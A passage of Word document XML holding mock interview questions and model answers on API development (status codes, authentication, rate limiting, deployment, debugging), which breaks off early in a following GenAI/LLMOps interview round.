        </w:rPr>
        <w:t>Q5. What are important HTTP status codes every API developer should know?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Important status codes include 200 for successful read or update, 201 for created, 202 for accepted async processing, 204 for success with no response body, 400 for invalid request, 401 for unauthenticated, 403 for authenticated but not authorized, 404 for not found, 409 for conflict, 422 for validation errors, 429 for rate limiting, 500 for unexpected server error, 502 or 503 for upstream/service availability issues, and 504 for gateway timeout. Good APIs use status codes consistently and include a useful error body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you validate API request payloads and query parameters?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I validate request payloads using schema models, type checks, required fields, allowed values, size limits, format checks, and business rules. In FastAPI this is commonly done with Pydantic models. In other frameworks, similar validation libraries exist. I validate query parameters for pagination limits, sorting fields, filters, and date ranges. Validation should happen before business logic, and validation errors should return a consistent 400 or 422 response without exposing internal details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you implement authentication in an API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Authentication verifies who the caller is. Depending on the use case, I would use OAuth2/OIDC with an identity provider, JWT bearer tokens, session cookies for web apps, API keys for service integrations, or mTLS for service-to-service authentication. In production, I prefer short-lived tokens, token validation at the gateway or service layer, secure secret storage, HTTPS, proper token audience and issuer checks, and careful logging so tokens are never exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is the difference between authentication and authorization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Authentication answers: who are you? Authorization answers: what are you allowed to do? For example, a user may authenticate successfully with a valid token, but still not be authorized to delete a production resource. In API design, I first validate identity, then check roles, scopes, groups, tenant ownership, or resource-level permissions before allowing the operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do JWT tokens work in API authentication?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A JWT is a signed token containing claims such as subject, issuer, audience, expiry, scopes, and roles. The API validates the token signature using a shared secret or public key, checks expiry, issuer, and audience, and then uses claims for identity and authorization decisions. JWTs are useful because services can validate tokens without calling the identity provider every time, but they must be short-lived, properly verified, and never trusted without checking signature and claims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you implement role-based access control for APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would define roles or scopes based on business operations, not just technical endpoints. For example, viewer can read, operator can trigger approved actions, and admin can manage configuration. In the API, authorization middleware or dependencies should check the caller's role, scope, tenant, and resource ownership. For sensitive operations, I may require additional approval, audit logging, or break-glass workflows. I would also test authorization paths because broken access control is one of the most common API risks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How do you handle database transactions in API development?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A transaction groups related database changes so they either all succeed or all roll back. For example, when creating an order and reducing inventory, both changes should be committed together or not at all. In API code, I keep transactions short, avoid long external calls inside transactions, handle rollback on exceptions, and design idempotency for retry scenarios. For distributed systems, I avoid pretending one database transaction can cover every external service; instead I use outbox patterns, queues, or compensating actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How should an API handle errors and return error responses?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An API should return consistent error responses with status code, error code, message, and optional correlation ID. Validation errors should tell the client what field is wrong. Authentication and authorization errors should be clear but not leak sensitive details. Server errors should not expose stack traces. Internally, the API should log enough context for debugging, including trace ID, route, status, dependency, and exception type. Good error handling improves both client experience and incident response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How do you handle API versioning without breaking existing clients?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Versioning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I avoid breaking changes where possible. For breaking changes, I use versioning such as /v1 and /v2 paths, headers, or media types depending on the platform standard. I keep old versions running during a deprecation window, communicate migration timelines, and monitor usage by client. Additive changes like adding optional fields are usually safe. Removing fields, changing meaning, changing required fields, or changing status codes can break clients, so those require versioning and coordination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How would you implement pagination, filtering, and sorting in an API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Pagination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For pagination, I can use limit and offset for simple cases, but cursor-based pagination is better for large or frequently changing datasets. Filtering should allow approved fields only, such as status, date range, owner, or region. Sorting should also whitelist allowed fields to avoid unsafe queries. I would define max page size, return metadata such as next cursor, and ensure database indexes support common filter and sort patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What is idempotency in APIs and why is it important?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Idempotency</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Idempotency means repeating the same request produces the same result without duplicate side effects. GET, PUT, and DELETE are generally expected to be idempotent. POST is not automatically idempotent, so for payment, order, or automation-trigger APIs, I would use an idempotency key. This matters because clients retry after timeouts, networks fail, and gateways can resend requests. Without idempotency, retries can create duplicate orders, duplicate jobs, or unsafe repeated actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. How would you implement rate limiting and throttling for APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would usually implement rate limiting at the API gateway, ingress, load balancer, or service mesh layer, and sometimes in the application for tenant-specific rules. Common strategies include fixed window, sliding window, token bucket, and leaky bucket. I would return 429 when limits are exceeded and include retry information where appropriate. Rate limiting protects the API from abuse, runaway clients, and noisy tenants, but limits should be based on real capacity and business needs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. What API security best practices would you follow in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would enforce HTTPS, strong authentication, authorization, input validation, output encoding where needed, rate limiting, secure CORS, safe error responses, dependency scanning, secret management, audit logging, and least-privilege access to databases and cloud services. I would also protect against common risks such as broken access control, injection, excessive data exposure, SSRF, insecure direct object references, and sensitive data in logs. Security should be handled at both gateway and application layers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. How would you test APIs before releasing them to production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would test APIs at multiple levels: unit tests for business logic, integration tests with database or dependencies, contract tests for request/response compatibility, authentication and authorization tests, validation tests, negative tests, performance/load tests, and security checks. I would also test migration compatibility and rollback behavior. In CI/CD, tests should run automatically on pull requests, and production deployments should include smoke tests and health checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. How do you document APIs for frontend teams and external consumers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I document APIs using OpenAPI or Swagger with endpoint descriptions, request and response schemas, status codes, error formats, authentication requirements, examples, pagination rules, rate limits, and versioning policy. Documentation should be generated from code where possible but still reviewed for clarity. For external consumers, I would also provide onboarding notes, sample curl commands, SDK examples if needed, and a changelog.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. What logs, metrics, and traces would you add to a production API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For logs, I would add structured JSON logs with request ID, trace ID, method, route, status code, latency, user or tenant ID when safe, dependency name, and error type. For metrics, I would track request count, error rate, p95 and p99 latency, saturation, database latency, dependency failures, and rate-limit events. For traces, I would instrument inbound requests, database calls, external API calls, queue publishing, and important business operations. Correlation IDs make debugging across services much faster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. How would you improve API performance and reduce latency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would start by measuring latency by route and dependency, then identify whether the bottleneck is application CPU, database queries, external API calls, network, serialization, or cold starts. Fixes may include indexing queries, connection pooling, caching, async I/O for suitable workloads, reducing payload size, pagination, avoiding N+1 queries, tuning worker count, and moving slow work to background jobs. I would validate improvements with load testing and production metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. How would you design an API to handle high traffic?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Scalability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would design for horizontal scaling with stateless API instances behind a load balancer, autoscaling based on CPU, latency, or request rate, connection pooling, caching, rate limiting, and resilient dependency handling. I would use queues for long-running or bursty work, circuit breakers or timeouts for downstream services, and database scaling strategies such as read replicas, indexes, partitioning, or caching. Observability and capacity testing are critical because scaling the API alone does not help if the database is the bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. How would you deploy an API using Docker and Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would build a minimal Docker image, run as a non-root user, configure the app through environment variables or mounted secrets, and expose the application port. In Kubernetes, I would create a Deployment, Service, ConfigMap, Secret, readiness and liveness probes, resource requests and limits, HPA, and Ingress or gateway routing. I would use immutable image tags, rolling or canary deployments, monitor error rate and latency after rollout, and keep rollback available.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. How would you design a CI/CD pipeline for API development?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The pipeline should run formatting, linting, unit tests, integration tests, API contract tests, dependency scanning, secret scanning, and container image scanning. Then it should build an immutable image, push it to a registry, deploy to dev or staging, run smoke tests, and promote to production with approval or automated gates. For production, I would include database migration safety checks, health checks, monitoring validation, and rollback. The pipeline should make broken API changes visible before they reach clients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. An API is returning intermittent 500 errors after deployment. How would you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would first check whether the errors started after a specific deployment, config change, or traffic increase. Then I would inspect logs by request ID, error type, route, and pod version. I would check Kubernetes events, restarts, OOM kills, CPU throttling, readiness probe failures, database connection pool exhaustion, dependency timeouts, and recent schema changes. If impact is high and the previous version was stable, I would roll back or shift traffic while continuing root cause analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. An API latency increased suddenly in production. What would you check first?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would check latency by route, error rate, traffic volume, recent deployments, dependency latency, database query time, connection pool saturation, CPU and memory, garbage collection if relevant, and infrastructure changes. Distributed traces are very useful here because they show where time is spent: application code, database, cache, external API, or network. I would also compare p50, p95, and p99 because tail latency often reveals saturation before average latency does.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. Design a production-ready API platform for internal automation tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would build a secure internal API platform with authentication through the company identity provider, authorization based on roles and scopes, audit logs for every automation action, and approval controls for risky operations. The API would expose only approved workflows, validate inputs strictly, run long tasks asynchronously through a queue or job runner, and store job state in a database. It would run on Kubernetes or Cloud Run with CI/CD, immutable images, probes, autoscaling, structured logs, metrics, traces, dashboards, alerts, and rollback. For DevOps automation, least-privilege runtime identity and clear auditability are as important as the API code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 76 - GenAI and LLMOps Production Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is Generative AI and how is it different from traditional machine learning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Generative AI creates new content such as text, code, images, summaries, or answers. Traditional machine learning often predicts a label, score, class, or numeric value from structured inputs. For example, a traditional ML model may predict whether an alert is high risk, while a GenAI system may summarize an incident, draft a runbook, or answer questions from documentation. In production, GenAI still needs the same engineering discipline: security, evaluation, monitoring, cost control, latency management, and governance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What is an LLM and how does it generate responses?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An LLM, or Large Language Model, is a model trained on large amounts of text and code to predict and generate sequences of tokens. When we send a prompt, the model converts text into tokens, uses learned patterns and context to estimate likely next tokens, and generates a response step by step. It does not truly know facts like a database; it generates based on learned probability and provided context. That is why grounding, retrieval, validation, and evaluation are important in production systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What practical GenAI use cases have you seen for DevOps, SRE, or platform engineering?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Useful GenAI use cases for DevOps and SRE include incident summarization, log explanation, runbook search, Kubernetes troubleshooting assistants, Terraform review helpers, CI/CD failure summarization, security finding explanation, pull request summaries, cloud cost analysis summaries, and internal platform support chatbots. I would start with low-risk assistive workflows where a human reviews the output, then move toward controlled automation only after strong evaluation, access control, and audit logging are in place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is RAG and why do we use it with LLM applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
